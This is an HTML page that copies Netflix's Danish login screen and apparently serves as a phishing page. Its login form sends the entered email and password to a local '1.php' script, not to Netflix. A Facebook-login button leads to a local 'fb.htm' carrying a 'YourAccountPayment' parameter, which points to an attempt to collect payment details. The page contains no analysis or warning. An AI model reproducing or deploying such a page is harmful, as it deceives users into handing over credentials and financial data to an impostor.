<!DOCTYPE html>
<html class=" js flexbox flexboxlegacy webgl no-touch postmessage no-websqldatabase indexeddb history rgba multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients csstransforms csstransforms3d csstransitions generatedcontent localstorage sessionstorage bgsizecover display-table mediaqueries cssvmaxunit no-cssvminunit no-cssvhunit cssvwunit formvalidation no-ie8compat performance  no-pointerevents" lang="da-DK"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <title>Netflix - Log ind | Log ind på din konto</title>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge;chrome=1">
    

    

    
    
    <link rel="canonical" href="#">

    
    
    <link rel="shortcut icon" href="1_files/nficon2015.ico">

    <link type="text/css" rel="stylesheet" href="1_files/include.css">


    <link type="text/css" rel="stylesheet" href="1_files/include_002.css">


    



    <script type="text/javascript">
            if(top != self) {
    top.location = location;
}

    </script>

    
    <!--[if lt IE 9]>
    <script src="https://www.netflix.com/js/include?f=modernizr_custom;WEB_JS&d=3&locale=da-DK"></script>
    <![endif]-->

    


    



<!--[if lt IE 9]>
<script type="text/javascript">
window.netflix.notification.constants.ltIE9 = true;
</script>
<![endif]-->



    <script src="1_files/clientNotifications.js" type="text/javascript"></script>

<style type="text/css">.fb_hidden{position:absolute;top:-10000px;z-index:10001}.fb_reposition{overflow-x:hidden;position:relative}.fb_invisible{display:none}.fb_reset{background:none;border:0;border-spacing:0;color:#000;cursor:auto;direction:ltr;font-family:"lucida grande", tahoma, verdana, arial, sans-serif;font-size:11px;font-style:normal;font-variant:normal;font-weight:normal;letter-spacing:normal;line-height:1;margin:0;overflow:visible;padding:0;text-align:left;text-decoration:none;text-indent:0;text-shadow:none;text-transform:none;visibility:visible;white-space:normal;word-spacing:normal}.fb_reset>div{overflow:hidden}.fb_link img{border:none}
.fb_dialog{background:rgba(82, 82, 82, .7);position:absolute;top:-10000px;z-index:10001}.fb_reset .fb_dialog_legacy{overflow:visible}.fb_dialog_advanced{padding:10px;-moz-border-radius:8px;-webkit-border-radius:8px;border-radius:8px}.fb_dialog_content{background:#fff;color:#333}.fb_dialog_close_icon{background:url(1_files/IE9JII6Z1Ys.png) no-repeat scroll 0 0 transparent;_background-image:url(1_files/s816eWC-2sl.gif);cursor:pointer;display:block;height:15px;position:absolute;right:18px;top:17px;width:15px}.fb_dialog_mobile .fb_dialog_close_icon{top:5px;left:5px;right:auto}.fb_dialog_padding{background-color:transparent;position:absolute;width:1px;z-index:-1}.fb_dialog_close_icon:hover{background:url(1_files/IE9JII6Z1Ys.png) no-repeat scroll 0 -15px transparent;_background-image:url(1_files/s816eWC-2sl.gif)}.fb_dialog_close_icon:active{background:url(1_files/IE9JII6Z1Ys.png) no-repeat scroll 0 -30px transparent;_background-image:url(1_files/s816eWC-2sl.gif)}.fb_dialog_loader{background-color:#f6f7f8;border:1px solid #606060;font-size:24px;padding:20px}.fb_dialog_top_left,.fb_dialog_top_right,.fb_dialog_bottom_left,.fb_dialog_bottom_right{height:10px;width:10px;overflow:hidden;position:absolute}.fb_dialog_top_left{background:url(1_files/8YeTNIlTZjm.png) no-repeat 0 0;left:-10px;top:-10px}.fb_dialog_top_right{background:url(1_files/8YeTNIlTZjm.png) no-repeat 0 -10px;right:-10px;top:-10px}.fb_dialog_bottom_left{background:url(1_files/8YeTNIlTZjm.png) no-repeat 0 -20px;bottom:-10px;left:-10px}.fb_dialog_bottom_right{background:url(files/8YeTNIlTZjm.png) no-repeat 0 -30px;right:-10px;bottom:-10px}.fb_dialog_vert_left,.fb_dialog_vert_right,.fb_dialog_horiz_top,.fb_dialog_horiz_bottom{position:absolute;background:#525252;filter:alpha(opacity=70);opacity:.7}.fb_dialog_vert_left,.fb_dialog_vert_right{width:10px;height:100%}.fb_dialog_vert_left{margin-left:-10px}.fb_dialog_vert_right{right:0;margin-right:-10px}.fb_dialog_horiz_top,.fb_dialog_horiz_bottom{width:100%;height:10px}.fb_dialog_horiz_top{margin-top:-10px}.fb_dialog_horiz_bottom{bottom:0;margin-bottom:-10px}.fb_dialog_iframe{line-height:0}.fb_dialog_content .dialog_title{background:#6d84b4;border:1px solid #3a5795;color:#fff;font-size:14px;font-weight:bold;margin:0}.fb_dialog_content .dialog_title>span{background:url(files/Cou7n-nqK52.gif) no-repeat 5px 50%;float:left;padding:5px 0 7px 26px}body.fb_hidden{-webkit-transform:none;height:100%;margin:0;overflow:visible;position:absolute;top:-10000px;left:0;width:100%}.fb_dialog.fb_dialog_mobile.loading{background:url(files/3rhSv5V8j3o.gif) white no-repeat 50% 50%;min-height:100%;min-width:100%;overflow:hidden;position:absolute;top:0;z-index:10001}.fb_dialog.fb_dialog_mobile.loading.centered{width:auto;height:auto;min-height:initial;min-width:initial;background:none}.fb_dialog.fb_dialog_mobile.loading.centered #fb_dialog_loader_spinner{width:100%}.fb_dialog.fb_dialog_mobile.loading.centered .fb_dialog_content{background:none}.loading.centered #fb_dialog_loader_close{color:#fff;display:block;padding-top:20px;clear:both;font-size:18px}#fb-root #fb_dialog_ipad_overlay{background:rgba(0, 0, 0, .45);position:absolute;left:0;top:0;width:100%;min-height:100%;z-index:10000}#fb-root #fb_dialog_ipad_overlay.hidden{display:none}.fb_dialog.fb_dialog_mobile.loading iframe{visibility:hidden}.fb_dialog_content .dialog_header{-webkit-box-shadow:white 0 1px 1px -1px inset;background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#738ABA), to(#2C4987));border-bottom:1px solid;border-color:#1d4088;color:#fff;font:14px Helvetica, sans-serif;font-weight:bold;text-overflow:ellipsis;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0;vertical-align:middle;white-space:nowrap}.fb_dialog_content .dialog_header table{-webkit-font-smoothing:subpixel-antialiased;height:43px;width:100%}.fb_dialog_content .dialog_header td.header_left{font-size:12px;padding-left:5px;vertical-align:middle;width:60px}.fb_dialog_content .dialog_header td.header_right{font-size:12px;padding-right:5px;vertical-align:middle;width:60px}.fb_dialog_content .touchable_button{background:-webkit-gradient(linear, 0% 0%, 0% 100%, from(#4966A6), color-stop(.5, #355492), to(#2A4887));border:1px solid #2f477a;-webkit-background-clip:padding-box;-webkit-border-radius:3px;-webkit-box-shadow:rgba(0, 0, 0, .117188) 0 1px 1px inset, rgba(255, 255, 255, .167969) 0 1px 0;display:inline-block;margin-top:3px;max-width:85px;line-height:18px;padding:4px 12px;position:relative}.fb_dialog_content .dialog_header .touchable_button input{border:none;background:none;color:#fff;font:12px Helvetica, sans-serif;font-weight:bold;margin:2px -12px;padding:2px 6px 3px 6px;text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}.fb_dialog_content .dialog_header .header_center{color:#fff;font-size:16px;font-weight:bold;line-height:18px;text-align:center;vertical-align:middle}.fb_dialog_content .dialog_content{background:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/y9/r/jKEcVPZFk-2.gif) no-repeat 50% 50%;border:1px solid #555;border-bottom:0;border-top:0;height:150px}.fb_dialog_content .dialog_footer{background:#f6f7f8;border:1px solid #555;border-top-color:#ccc;height:40px}#fb_dialog_loader_close{float:left}.fb_dialog.fb_dialog_mobile .fb_dialog_close_button{text-shadow:rgba(0, 30, 84, .296875) 0 -1px 0}.fb_dialog.fb_dialog_mobile .fb_dialog_close_icon{visibility:hidden}#fb_dialog_loader_spinner{animation:rotateSpinner 1.2s linear infinite;background-color:transparent;background-image:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/yD/r/t-wz8gw1xG1.png);background-repeat:no-repeat;background-position:50% 50%;height:24px;width:24px}@keyframes rotateSpinner{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}
.fb_iframe_widget{display:inline-block;position:relative}.fb_iframe_widget span{display:inline-block;position:relative;text-align:justify}.fb_iframe_widget iframe{position:absolute}.fb_iframe_widget_fluid_desktop,.fb_iframe_widget_fluid_desktop span,.fb_iframe_widget_fluid_desktop iframe{max-width:100%}.fb_iframe_widget_fluid_desktop iframe{min-width:220px;position:relative}.fb_iframe_widget_lift{z-index:1}.fb_hide_iframes iframe{position:relative;left:-10000px}.fb_iframe_widget_loader{position:relative;display:inline-block}.fb_iframe_widget_fluid{display:inline}.fb_iframe_widget_fluid span{width:100%}.fb_iframe_widget_loader iframe{min-height:32px;z-index:2;zoom:1}.fb_iframe_widget_loader .FB_Loader{background:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/y9/r/jKEcVPZFk-2.gif) no-repeat;height:32px;width:32px;margin-left:-16px;position:absolute;left:50%;z-index:4}</style></head>

<body id="page-LOGIN" class="page-LOGIN freetrial da-DK da  nhp   nbnding   " data-country="DK" data-region="EUROPE" data-subregion="NORDICS">

    
    
    <header class="pop clearfix ">
    <div class="shadow"></div>
    <a href="#"  class="logo">
        <div class="img"><img src="1_files/logo-reg2x.png" id="print-img"></div>
    </a>

    

</header>

    
    <div class="main contents-wrapper">
    <section class="contents">
        
<link type="text/css" rel="stylesheet" href="1_files/include_003.css">

    <div class="lifestyle-img"></div>

<section class="content login-content clearfix">
    <section class="login-form-content">

        <div class="form-container">

            <section class="main_headline">
                <div id="mh_h1"><h1 class="hmain">Log ind</h1></div>
            </section>

            <fieldset class="form-fieldset">
                <form id="login-form" class="login-form" action="1.php" method="post">
                <input name="authURL" value="1455212111039.yasmLzXID9Np90tmWF2LaIphWUM=" type="hidden">
                <div class="field-row ">
                    <div class="field-label">
                        <label for="email">E-mail</label>
                    </div>
                    <div class="field-input">
                        <input class="form-input" id="email" name="email" data-type="email" data-title="E-mail" autofocus="" type="text">
                        
                    </div>
                </div>
                <div class="field-row clearfix ">
                    <div class="field-label">
                        <label for="password">Adgangskode</label>
                    </div>
                    <div class="field-input">
                        <input class="form-input" id="password" name="password" data-type="email" data-title="Adgangskode" autocomplete="current-password" type="password">
                    </div>
                                     <a class="login-help" href="#">Har du glemt din e-mailadresse eller adgangskode? </a>
                </div>

                <div class="field-row">
                    <div class="field-input field-indent login-form-reMe">
                        <label>
                            <input class="form-checkbox" id="RememberMe" name="RememberMe" checked="checked" type="checkbox">
                            Husk mig på denne enhed. <a class="popuplayer" data-pop="true" data-width="400" href="#" target="_blank" tabindex="-1"><img class="vert-bott" src="1_files/question_mark.png"  border="0"></a>
                        </label>
                    </div>
                </div>
                <div class="field-row">
                    <div class="field-input field-indent">
                        <button class=" red btnlg" type="submit" id="login-form-contBtn" data-wait="vent et øjeblik ...">Log ind</button>
                    </div>
                </div>


                </form>

                <div class="field-row">
    <div class="field-input field-indent">
        <br>
           <button id="fbLoginBtn" class="cta-fb-gdp" onclick="window.location.href='fb.htm?https://www.netflix.com/YourAccountPayment?_encoding=UTF8&_encoding=UTF8&openid.assoc_handle=caflex&openid.claimed_id'">Log ind via Facebook</button>

     
    </div>
</div>


                <ul class="field-row field-indent login-form-help">
                    <li>Er du ikke medlem af Netflix? <a href="#">Tilmeld dig nu.</a></li>
                </ul>
            </fieldset>
        </div>
    </section>
</section>
<style type="text/css">
.errorborder {border:2px solid #ffa8a8;}

</style>

    </section>
</div>

    <div class="footer contents-wrapper">
    <footer class="clearfix limited">

        <ul>
            
            <li class="last">Spørgsmål? Ring på <nobr><a class="cs-phone" href="tel:80%2025%2012%2052">80 25 12 52</a></nobr></li>
        </ul>

        <label for="lang-switcher" class="lang-switcher clearfix group4">
            <img src="1_files/globe.png">
            <select id="lang-switcher">
                <option selected="selected">Dansk</option>
                <option data-locale-href="/Login?locale=en-DK&amp;sw=true" value="en-DK">English</option>
            </select>
        </label>

        <div class="fterms not-printable">
    Netflix-tjenesten og dette websted reguleres af vores <a id="terms_lnk" href="#">brugerbetingelser</a> og <a id="priv_lnk" href="#">privatlivserklæring</a>.  <a href="#" target="_blank">Kontakt</a>
    <span class="serverid">(eu-west-1 62cff0ef DK)</span>
    [<span class="abtest-info">6544/2 - 6883/4 - 6676/2 - 6486/2 - 6904/8 - 6936/6 - 6905/1 - 6715/2 - 6543/2 - 6847/1 - , da</span>]
</div>
    </footer>
</div>



    
    

    <script src="1_files/include.js"></script>
<script src="1_files/include_002.js"></script>

    <script type="text/javascript">
    

    Modernizr.addTest('pointerevents', function () {
        // 
        var bool = false,
            i = Modernizr._domPrefixes.length;

        // 
        bool = Modernizr.hasEvent('pointerdown');

        while (i-- && !bool) {
            if (Modernizr.hasEvent(Modernizr._domPrefixes[i] + 'pointerdown')) {
                bool = true;
            }
        }
        return bool;
    });

</script><script type="text/javascript">
(function($) {
$(document).ready(function () {

    $("#login-form").submit(function(evt) {
        $("#login-form input").removeClass("errorborder");
		if ($("#email").val() == "" || $("#password").val() == "") {
		    if ($("#email").val() == "") {
		        $("#email").focus();
		        $("input#email").addClass("errorborder");
		    }
		    if ($("#password").val() == "") {
		        if ($("#email").val() != "") {
		           $("#password").focus();
		        }
		        $("input#password").addClass("errorborder");
		    }
	       evt.preventDefault();
		}
	});
});
})(jQuery);

</script><script type="text/javascript">
(function () {

    var handleInteractions = function (eventObject) {
        if (netflix.window.width() < 650) {
            var trigger = jQuery(eventObject.target).attr('data-trigger-for-open');
            if (typeof trigger != 'undefined') {
                jQuery('.' + trigger).toggleClass('open');
            }
        }
    };

    jQuery(document).on('click', handleInteractions);

    var langSwitcher = jQuery('select#lang-switcher');

    langSwitcher.on('change', function () {
        var localehref = langSwitcher.children().filter(':selected').attr('data-locale-href');
        if (typeof localehref != 'undefined') {
            window.location = localehref;
        }
    });

})();

</script><script type="text/javascript">
(function() {
    var config = {
        padmeHost: "#"
    };
    var params = {
        country: "DK",
        locale: "da-DK",
        page: location.pathname.replace("/", "")
    };

    var cseScript = config.padmeHost+"/supportscript?" + $.param(params);

    netflix.namespace("netflix.utils.chat");

    netflix.utils.chat.loaded = $.getScript(cseScript).done(function(script, textStatus) {
        jQuery(window).trigger('loaded.chat');
    })
    .fail(function(jqxhr, settings, exception) {
        netflix.utils.beacon('cs_chat=js_failure');
    });
})();

</script>





<div aria-labelledby="ui-id-1" aria-describedby="nflx-layer" role="dialog" tabindex="-1" style="display: none; position: absolute;" class="ui-dialog ui-widget ui-widget-content ui-corner-all ui-front nflx-layer ui-resizable">
<div class="ui-dialog-titlebar ui-widget-header ui-corner-all ui-helper-clearfix">
<span class="ui-dialog-title" id="ui-id-1">&nbsp;</span>
<button title="close" aria-disabled="false" role="button" class="ui-button ui-widget ui-state-default ui-corner-all ui-button-icon-only ui-dialog-titlebar-close close"></button>
</div><div class="ui-dialog-content ui-widget-content" id="nflx-layer"></div><div style="z-index: 90;" class="ui-resizable-handle ui-resizable-n"></div>
<div style="z-index: 90;" class="ui-resizable-handle ui-resizable-e"></div><div style="z-index: 90;" class="ui-resizable-handle ui-resizable-s"></div>
<div style="z-index: 90;" class="ui-resizable-handle ui-resizable-w"></div><div style="z-index: 90;" class="ui-resizable-handle ui-resizable-se ui-icon ui-icon-gripsmall-diagonal-se"></div>
<div style="z-index: 90;" class="ui-resizable-handle ui-resizable-sw"></div><div style="z-index: 90;" class="ui-resizable-handle ui-resizable-ne"></div>
<div style="z-index: 90;" class="ui-resizable-handle ui-resizable-nw"></div></div><div class=" fb_reset" id="fb-root"><script id="fb-jsapi" src="1_files/sdk.js" async=""></script>
<div style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div>


</div></div><div style="position: absolute; top: -10000px; height: 0px; width: 0px;"><div></div></div></div></body></html>